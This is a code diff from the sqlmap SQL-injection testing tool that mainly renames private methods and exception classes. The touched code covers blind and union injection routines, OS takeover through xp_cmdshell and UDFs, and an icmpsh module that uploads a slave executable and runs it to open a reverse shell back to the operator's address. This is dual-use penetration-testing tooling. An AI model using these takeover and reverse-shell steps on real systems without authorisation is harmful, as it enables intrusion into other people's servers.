@ -505,24 +505,24 @@ class XMLDump(object):
2. Writes the xml to the file 2. Writes the xml to the file
3. Closes the xml file 3. Closes the xml file
''' '''
if ((self.__outputFP is not None) and not(self.__outputFP.closed)): if ((self._outputFP is not None) and not(self._outputFP.closed)):
statusElem = self.__doc.createElement(STATUS_ELEM_NAME) statusElem = self.__doc.createElement(STATUS_ELEM_NAME)
statusElem.setAttributeNode(self.__createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus)))
if not resultStatus: if not resultStatus:
errorElem = self.__doc.createElement(ERROR_ELEM_NAME) errorElem = self.__doc.createElement(ERROR_ELEM_NAME)
if isinstance(resultMsg, Exception): if isinstance(resultMsg, Exception):
errorElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, type(resultMsg).__name__)) errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__))
else: else:
errorElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE))
errorElem.appendChild(self.__createTextNode(getUnicode(resultMsg))) errorElem.appendChild(self._createTextNode(getUnicode(resultMsg)))
statusElem.appendChild(errorElem) statusElem.appendChild(errorElem)
self.__addToRoot(statusElem) self._addToRoot(statusElem)
self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING))
self.__outputFP.close() self._outputFP.close()
def closeDumper(status, msg=""): def closeDumper(status, msg=""):

10
lib/parse/configfile.py
View File

@ -14,8 +14,8 @@ from lib.core.common import unArrayizeValue
from lib.core.common import UnicodeRawConfigParser from lib.core.common import UnicodeRawConfigParser
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.optiondict import optDict from lib.core.optiondict import optDict
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
@ -66,11 +66,11 @@ def configFileParser(configFile):
config.readfp(configFP) config.readfp(configFP)
except MissingSectionHeaderError: except MissingSectionHeaderError:
errMsg = "you have provided an invalid configuration file" errMsg = "you have provided an invalid configuration file"
raise sqlmapSyntaxException, errMsg raise SqlmapSyntaxException, errMsg
if not config.has_section("Target"): if not config.has_section("Target"):
errMsg = "missing a mandatory section 'Target' in the configuration file" errMsg = "missing a mandatory section 'Target' in the configuration file"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
condition = not config.has_option("Target", "url") condition = not config.has_option("Target", "url")
condition &= not config.has_option("Target", "logFile") condition &= not config.has_option("Target", "logFile")
@ -82,7 +82,7 @@ def configFileParser(configFile):
if condition: if condition:
errMsg = "missing a mandatory option in the configuration file " errMsg = "missing a mandatory option in the configuration file "
errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)" errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)"
raise sqlmapMissingMandatoryOptionException, errMsg raise SqlmapMissingMandatoryOptionException, errMsg
for family, optionData in optDict.items(): for family, optionData in optDict.items():
for option, datatype in optionData.items(): for option, datatype in optionData.items():

4
lib/request/basic.py
View File

@ -25,7 +25,7 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import HTTPHEADER from lib.core.enums import HTTPHEADER
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.exception import sqlmapCompressionException from lib.core.exception import SqlmapCompressionException
from lib.core.htmlentities import htmlEntities from lib.core.htmlentities import htmlEntities
from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import EVENTVALIDATION_REGEX
@ -211,7 +211,7 @@ def decodePage(page, contentEncoding, contentType):
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
kb.pageCompress = False kb.pageCompress = False
raise sqlmapCompressionException raise SqlmapCompressionException
if not conf.charset: if not conf.charset:
httpCharset, metaCharset = None, None httpCharset, metaCharset = None, None

4
lib/request/comparison.py
View File

@ -16,7 +16,7 @@ from lib.core.common import wasLastRequestHTTPError
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapNoneDataException from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import DIFF_TOLERANCE
from lib.core.settings import HTML_TITLE_REGEX from lib.core.settings import HTML_TITLE_REGEX
@ -92,7 +92,7 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
errMsg = "problem occured while retrieving original page content " errMsg = "problem occured while retrieving original page content "
errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "which prevents sqlmap from continuation. Please rerun, "
errMsg += "and if the problem persists turn off any optimization switches" errMsg += "and if the problem persists turn off any optimization switches"
raise sqlmapNoneDataException, errMsg raise SqlmapNoneDataException, errMsg
ratio = 1. * pageLength / len(seqMatcher.a) ratio = 1. * pageLength / len(seqMatcher.a)

44
lib/request/connect.py
View File

@ -50,10 +50,10 @@ from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE from lib.core.enums import PLACE
from lib.core.enums import POST_HINT from lib.core.enums import POST_HINT
from lib.core.enums import REDIRECTION from lib.core.enums import REDIRECTION
from lib.core.exception import sqlmapCompressionException from lib.core.exception import SqlmapCompressionException
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapSyntaxException from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import sqlmapValueException from lib.core.exception import SqlmapValueException
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_CONTENT_TYPE
from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
@ -87,11 +87,11 @@ class Connect(object):
""" """
@staticmethod @staticmethod
def __getPageProxy(**kwargs): def _getPageProxy(**kwargs):
return Connect.getPage(**kwargs) return Connect.getPage(**kwargs)
@staticmethod @staticmethod
def __retryProxy(**kwargs): def _retryProxy(**kwargs):
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
threadData.retriesCount += 1 threadData.retriesCount += 1
@ -129,10 +129,10 @@ class Connect(object):
time.sleep(1) time.sleep(1)
kwargs['retrying'] = True kwargs['retrying'] = True
return Connect.__getPageProxy(**kwargs) return Connect._getPageProxy(**kwargs)
@staticmethod @staticmethod
def __connReadProxy(conn): def _connReadProxy(conn):
retVal = "" retVal = ""
if not kb.dnsMode and conn: if not kb.dnsMode and conn:
@ -249,7 +249,7 @@ class Connect(object):
multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
conn = multipartOpener.open(unicodeencode(url), multipart) conn = multipartOpener.open(unicodeencode(url), multipart)
page = Connect.__connReadProxy(conn) page = Connect._connReadProxy(conn)
responseHeaders = conn.info() responseHeaders = conn.info()
responseHeaders[URI_HTTP_HEADER] = conn.geturl() responseHeaders[URI_HTTP_HEADER] = conn.geturl()
page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
@ -360,11 +360,11 @@ class Connect(object):
# Get HTTP response # Get HTTP response
if hasattr(conn, 'redurl'): if hasattr(conn, 'redurl'):
page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\
else Connect.__connReadProxy(conn) else Connect._connReadProxy(conn)
skipLogTraffic = kb.redirectChoice == REDIRECTION.NO skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
code = conn.redcode code = conn.redcode
else: else:
page = Connect.__connReadProxy(conn) page = Connect._connReadProxy(conn)
code = code or conn.code code = code or conn.code
responseHeaders = conn.info() responseHeaders = conn.info()
@ -399,8 +399,8 @@ class Connect(object):
kwargs['post'] = None kwargs['post'] = None
try: try:
return Connect.__getPageProxy(**kwargs) return Connect._getPageProxy(**kwargs)
except sqlmapSyntaxException: except SqlmapSyntaxException:
pass pass
# Explicit closing of connection object # Explicit closing of connection object
@ -459,11 +459,11 @@ class Connect(object):
if e.code == httplib.UNAUTHORIZED: if e.code == httplib.UNAUTHORIZED:
errMsg = "not authorized, try to provide right HTTP " errMsg = "not authorized, try to provide right HTTP "
errMsg += "authentication type and valid credentials (%d)" % code errMsg += "authentication type and valid credentials (%d)" % code
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
elif e.code == httplib.NOT_FOUND: elif e.code == httplib.NOT_FOUND:
if raise404: if raise404:
errMsg = "page not found (%d)" % code errMsg = "page not found (%d)" % code
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg
else: else:
debugMsg = "page not found (%d)" % code debugMsg = "page not found (%d)" % code
logger.debug(debugMsg) logger.debug(debugMsg)
@ -476,22 +476,22 @@ class Connect(object):
if threadData.retriesCount < conf.retries and not kb.threadException: if threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request" warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg) logger.critical(warnMsg)
return Connect.__retryProxy(**kwargs) return Connect._retryProxy(**kwargs)
elif kb.testMode: elif kb.testMode:
logger.critical(warnMsg) logger.critical(warnMsg)
return None, None, None return None, None, None
else: else:
raise sqlmapConnectionException, warnMsg raise SqlmapConnectionException, warnMsg
else: else:
debugMsg = "got HTTP error code: %d (%s)" % (code, status) debugMsg = "got HTTP error code: %d (%s)" % (code, status)
logger.debug(debugMsg) logger.debug(debugMsg)
except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, sqlmapCompressionException), e: except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine, httplib.IncompleteRead, ProxyError, SqlmapCompressionException), e:
tbMsg = traceback.format_exc() tbMsg = traceback.format_exc()
if "no host given" in tbMsg: if "no host given" in tbMsg:
warnMsg = "invalid url address used (%s)" % repr(url) warnMsg = "invalid url address used (%s)" % repr(url)
raise sqlmapSyntaxException, warnMsg raise SqlmapSyntaxException, warnMsg
elif "forcibly closed" in tbMsg: elif "forcibly closed" in tbMsg:
warnMsg = "connection was forcibly closed by the target url" warnMsg = "connection was forcibly closed by the target url"
elif "timed out" in tbMsg: elif "timed out" in tbMsg:
@ -519,12 +519,12 @@ class Connect(object):
elif threadData.retriesCount < conf.retries and not kb.threadException: elif threadData.retriesCount < conf.retries and not kb.threadException:
warnMsg += ". sqlmap is going to retry the request" warnMsg += ". sqlmap is going to retry the request"
logger.critical(warnMsg) logger.critical(warnMsg)
return Connect.__retryProxy(**kwargs) return Connect._retryProxy(**kwargs)
elif kb.testMode: elif kb.testMode:
logger.critical(warnMsg) logger.critical(warnMsg)
return None, None, None return None, None, None
else: else:
raise sqlmapConnectionException, warnMsg raise SqlmapConnectionException, warnMsg
finally: finally:
page = page if isinstance(page, unicode) else getUnicode(page) page = page if isinstance(page, unicode) else getUnicode(page)
@ -593,7 +593,7 @@ class Connect(object):
if not isinstance(payload, basestring): if not isinstance(payload, basestring):
errMsg = "tamper function '%s' returns " % function.func_name errMsg = "tamper function '%s' returns " % function.func_name
errMsg += "invalid payload type ('%s')" % type(payload) errMsg += "invalid payload type ('%s')" % type(payload)
raise sqlmapValueException, errMsg raise SqlmapValueException, errMsg
value = agent.replacePayload(value, payload) value = agent.replacePayload(value, payload)

4
lib/request/httpshandler.py
View File

@ -10,7 +10,7 @@ import socket
import urllib2 import urllib2
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
ssl = None ssl = None
try: try:
@ -57,7 +57,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
logger.debug("SSL connection error occured ('%s')" % errMsg) logger.debug("SSL connection error occured ('%s')" % errMsg)
if not success: if not success:
raise sqlmapConnectionException, "can't establish SSL connection" raise SqlmapConnectionException, "can't establish SSL connection"
class HTTPSHandler(urllib2.HTTPSHandler): class HTTPSHandler(urllib2.HTTPSHandler):
def https_open(self, req): def https_open(self, req):

42
lib/request/inject.py
View File

@ -36,8 +36,8 @@ from lib.core.enums import CHARSET_TYPE
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import EXPECTED from lib.core.enums import EXPECTED
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapNotVulnerableException from lib.core.exception import SqlmapNotVulnerableException
from lib.core.exception import sqlmapUserQuitException from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
from lib.core.settings import SQL_SCALAR_REGEX from lib.core.settings import SQL_SCALAR_REGEX
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@ -50,7 +50,7 @@ from lib.techniques.dns.use import dnsUse
from lib.techniques.error.use import errorUse from lib.techniques.error.use import errorUse
from lib.techniques.union.use import unionUse from lib.techniques.union.use import unionUse
def __goDns(payload, expression): def _goDns(payload, expression):
value = None value = None
if conf.dnsName and kb.dnsTest is not False: if conf.dnsName and kb.dnsTest is not False:
@ -62,12 +62,12 @@ def __goDns(payload, expression):
return value return value
def __goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None): def _goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None, dump=False, field=None):
start = time.time() start = time.time()
value = None value = None
count = 0 count = 0
value = __goDns(payload, expression) value = _goDns(payload, expression)
if value: if value:
return value return value
@ -95,7 +95,7 @@ def __goInference(payload, expression, charsetType=None, firstChar=None, lastCha
return value return value
def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False): def _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
outputs = [] outputs = []
origExpr = None origExpr = None
@ -114,7 +114,7 @@ def __goInferenceFields(expression, expressionFields, expressionFieldsList, payl
else: else:
expressionReplaced = expression.replace(expressionFields, field, 1) expressionReplaced = expression.replace(expressionFields, field, 1)
output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field) output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
if isinstance(num, int): if isinstance(num, int):
expression = origExpr expression = origExpr
@ -123,7 +123,7 @@ def __goInferenceFields(expression, expressionFields, expressionFieldsList, payl
return outputs return outputs
def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False):
""" """
Retrieve the output of a SQL query characted by character taking Retrieve the output of a SQL query characted by character taking
advantage of an blind SQL injection vulnerability on the affected advantage of an blind SQL injection vulnerability on the affected
@ -143,7 +143,7 @@ def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, cha
untilOrderChar = None untilOrderChar = None
if not unpack: if not unpack:
return __goInference(payload, expression, charsetType, firstChar, lastChar, dump) return _goInference(payload, expression, charsetType, firstChar, lastChar, dump)
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
@ -233,7 +233,7 @@ def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, cha
countedExpression = countedExpression[:untilOrderChar] countedExpression = countedExpression[:untilOrderChar]
if not stopLimit: if not stopLimit:
count = __goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar)
if isNumPosStrValue(count): if isNumPosStrValue(count):
count = int(count) count = int(count)
@ -252,7 +252,7 @@ def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, cha
stopLimit = count stopLimit = count
elif test[0] in ("q", "Q"): elif test[0] in ("q", "Q"):
raise sqlmapUserQuitException raise SqlmapUserQuitException
elif test.isdigit() and int(test) > 0 and int(test) <= count: elif test.isdigit() and int(test) > 0 and int(test) <= count:
stopLimit = int(test) stopLimit = int(test)
@ -302,7 +302,7 @@ def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, cha
try: try:
for num in xrange(startLimit, stopLimit): for num in xrange(startLimit, stopLimit):
output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
outputs.append(output) outputs.append(output)
except KeyboardInterrupt: except KeyboardInterrupt:
@ -315,11 +315,11 @@ def __goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, cha
elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]
outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None
def __goBooleanProxy(expression): def _goBooleanProxy(expression):
""" """
Retrieve the output of a boolean based SQL query Retrieve the output of a boolean based SQL query
""" """
@ -343,7 +343,7 @@ def __goBooleanProxy(expression):
return output return output
def __goUnion(expression, unpack=True, dump=False): def _goUnion(expression, unpack=True, dump=False):
""" """
Retrieve the output of a SQL query taking advantage of an union SQL Retrieve the output of a SQL query taking advantage of an union SQL
injection vulnerability on the affected parameter. injection vulnerability on the affected parameter.
@ -399,7 +399,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
if not conf.forceDns: if not conf.forceDns:
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
kb.technique = PAYLOAD.TECHNIQUE.UNION kb.technique = PAYLOAD.TECHNIQUE.UNION
value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
count += 1 count += 1
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
@ -420,9 +420,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN
if expected == EXPECTED.BOOL: if expected == EXPECTED.BOOL:
value = __goBooleanProxy(booleanExpression) value = _goBooleanProxy(booleanExpression)
else: else:
value = __goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
count += 1 count += 1
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
@ -434,16 +434,16 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
kb.technique = PAYLOAD.TECHNIQUE.STACKED kb.technique = PAYLOAD.TECHNIQUE.STACKED
if expected == EXPECTED.BOOL: if expected == EXPECTED.BOOL:
value = __goBooleanProxy(booleanExpression) value = _goBooleanProxy(booleanExpression)
else: else:
value = __goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
if value and isinstance(value, basestring): if value and isinstance(value, basestring):
value = value.strip() if value.strip() else value[:1] value = value.strip() if value.strip() else value[:1]
else: else:
errMsg = "none of the injection types identified can be " errMsg = "none of the injection types identified can be "
errMsg += "leveraged to retrieve queries output" errMsg += "leveraged to retrieve queries output"
raise sqlmapNotVulnerableException, errMsg raise SqlmapNotVulnerableException, errMsg
finally: finally:
kb.resumeValues = True kb.resumeValues = True

4
lib/request/proxy.py
View File

@ -10,7 +10,7 @@ import socket
import urllib import urllib
import urllib2 import urllib2
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.settings import PYVERSION from lib.core.settings import PYVERSION
if PYVERSION >= "2.6": if PYVERSION >= "2.6":
@ -117,4 +117,4 @@ else:
class ProxyHTTPSHandler: class ProxyHTTPSHandler:
def __init__(self, *args, **kwargs): def __init__(self, *args, **kwargs):
errMsg = "unsupported feature on versions of Python before 2.6" errMsg = "unsupported feature on versions of Python before 2.6"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg

4
lib/request/rangehandler.py
View File

@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
import urllib import urllib
import urllib2 import urllib2
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
class HTTPRangeHandler(urllib2.BaseHandler): class HTTPRangeHandler(urllib2.BaseHandler):
""" """
@ -47,4 +47,4 @@ class HTTPRangeHandler(urllib2.BaseHandler):
def http_error_416(self, req, fp, code, msg, hdrs): def http_error_416(self, req, fp, code, msg, hdrs):
# HTTP's Range Not Satisfiable error # HTTP's Range Not Satisfiable error
errMsg = "Invalid range" errMsg = "Invalid range"
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg

4
lib/request/redirecthandler.py
View File

@ -16,7 +16,7 @@ from lib.core.common import logHTTPTraffic
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.enums import HTTPHEADER from lib.core.enums import HTTPHEADER
from lib.core.enums import REDIRECTION from lib.core.enums import REDIRECTION
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS
from lib.core.settings import MAX_TOTAL_REDIRECTIONS from lib.core.settings import MAX_TOTAL_REDIRECTIONS
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@ -102,4 +102,4 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS):
errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys())
errMsg += "please check all provided parameters and/or provide missing ones." errMsg += "please check all provided parameters and/or provide missing ones."
raise sqlmapConnectionException, errMsg raise SqlmapConnectionException, errMsg

14
lib/takeover/abstraction.py
View File

@ -15,7 +15,7 @@ from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapUnsupportedFeatureException from lib.core.exception import SqlmapUnsupportedFeatureException
from lib.core.shell import autoCompletion from lib.core.shell import autoCompletion
from lib.request import inject from lib.request import inject
from lib.takeover.udf import UDF from lib.takeover.udf import UDF
@ -49,7 +49,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
else: else:
errMsg = "Feature not yet implemented for the back-end DBMS" errMsg = "Feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
def evalCmd(self, cmd, first=None, last=None): def evalCmd(self, cmd, first=None, last=None):
retVal = None retVal = None
@ -65,7 +65,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
else: else:
errMsg = "Feature not yet implemented for the back-end DBMS" errMsg = "Feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
return safechardecode(retVal) return safechardecode(retVal)
@ -110,7 +110,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
else: else:
errMsg = "feature not yet implemented for the back-end DBMS" errMsg = "feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg raise SqlmapUnsupportedFeatureException, errMsg
infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows")
infoMsg += "'x' or 'q' and press ENTER" infoMsg += "'x' or 'q' and press ENTER"
@ -141,7 +141,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
self.runCmd(command) self.runCmd(command)
def __initRunAs(self): def _initRunAs(self):
if not conf.dbmsCred: if not conf.dbmsCred:
return return
@ -172,7 +172,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
# inject.goStacked(expression) # inject.goStacked(expression)
def initEnv(self, mandatory=True, detailed=False, web=False): def initEnv(self, mandatory=True, detailed=False, web=False):
self.__initRunAs() self._initRunAs()
if self.envInitialized: if self.envInitialized:
return return
@ -201,6 +201,6 @@ class Abstraction(Web, UDF, Xp_cmdshell):
self.xpCmdshellInit() self.xpCmdshellInit()
else: else:
errMsg = "feature not yet implemented for the back-end DBMS" errMsg = "feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
self.envInitialized = True self.envInitialized = True

46
lib/takeover/icmpsh.py
View File

@ -25,71 +25,71 @@ class ICMPsh:
This class defines methods to call icmpsh for plugins. This class defines methods to call icmpsh for plugins.
""" """
def __initVars(self): def _initVars(self):
self.lhostStr = None self.lhostStr = None
self.rhostStr = None self.rhostStr = None
self.localIP = getLocalIP() self.localIP = getLocalIP()
self.remoteIP = getRemoteIP() self.remoteIP = getRemoteIP()
self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe")) self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe"))
def __selectRhost(self): def _selectRhost(self):
message = "what is the back-end DBMS address? [%s] " % self.remoteIP message = "what is the back-end DBMS address? [%s] " % self.remoteIP
address = readInput(message, default=self.remoteIP) address = readInput(message, default=self.remoteIP)
return address return address
def __selectLhost(self): def _selectLhost(self):
message = "what is the local address? [%s] " % self.localIP message = "what is the local address? [%s] " % self.localIP
address = readInput(message, default=self.localIP) address = readInput(message, default=self.localIP)
return address return address
def __prepareIngredients(self, encode=True): def _prepareIngredients(self, encode=True):
self.lhostStr = self.__selectLhost() self.lhostStr = self._selectLhost()
self.rhostStr = self.__selectRhost() self.rhostStr = self._selectRhost()
def __runIcmpshMaster(self): def _runIcmpshMaster(self):
infoMsg = "running icmpsh master locally" infoMsg = "running icmpsh master locally"
logger.info(infoMsg) logger.info(infoMsg)
icmpshmaster(self.lhostStr, self.rhostStr) icmpshmaster(self.lhostStr, self.rhostStr)
def __runIcmpshSlaveRemote(self): def _runIcmpshSlaveRemote(self):
infoMsg = "running icmpsh slave remotely" infoMsg = "running icmpsh slave remotely"
logger.info(infoMsg) logger.info(infoMsg)
cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr) cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr)
self.execCmd(cmd, silent=True) self.execCmd(cmd, silent=True)
def uploadIcmpshSlave(self, web=False): def uploadIcmpshSlave(self, web=False):
self.__initVars() self._initVars()
self.__randStr = randomStr(lowercase=True) self._randStr = randomStr(lowercase=True)
self.__icmpslaveRemoteBase = "tmpi%s.exe" % self.__randStr self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr
if web: if web:
self.__icmpslaveRemote = "%s/%s" % (self.webDirectory, self.__icmpslaveRemoteBase) self._icmpslaveRemote = "%s/%s" % (self.webDirectory, self._icmpslaveRemoteBase)
else: else:
self.__icmpslaveRemote = "%s/%s" % (conf.tmpPath, self.__icmpslaveRemoteBase) self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase)
